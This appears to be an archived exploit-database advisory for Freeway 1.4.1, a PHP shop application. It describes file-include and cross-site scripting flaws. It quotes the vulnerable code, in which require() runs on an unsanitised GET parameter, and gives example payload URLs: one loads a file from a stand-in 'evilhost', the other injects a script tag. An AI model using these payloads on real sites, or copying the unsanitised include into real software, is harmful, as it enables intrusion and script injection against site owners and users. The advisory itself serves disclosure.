Exploit Freeway 1.4.1 - Multiple Input Validation Vulnerabilities

[Exploiter]

EDB-ID

32240

Проверка EDB

1. Пройдено

Автор

DIGITAL SECURITY RESEARCH GROUP

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2008-08-13

source: https://www.securityfocus.com/bid/30676/info

Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Freeway 1.4.1.171 is affected; other versions may also be vulnerable. 

1. Multiple Remote/Local File Include

Example:

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php

Local File Include vulnerability found in script  includes/events_application_top.php

2. Linked XSS vulnerability

Example

http://www.example.com/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>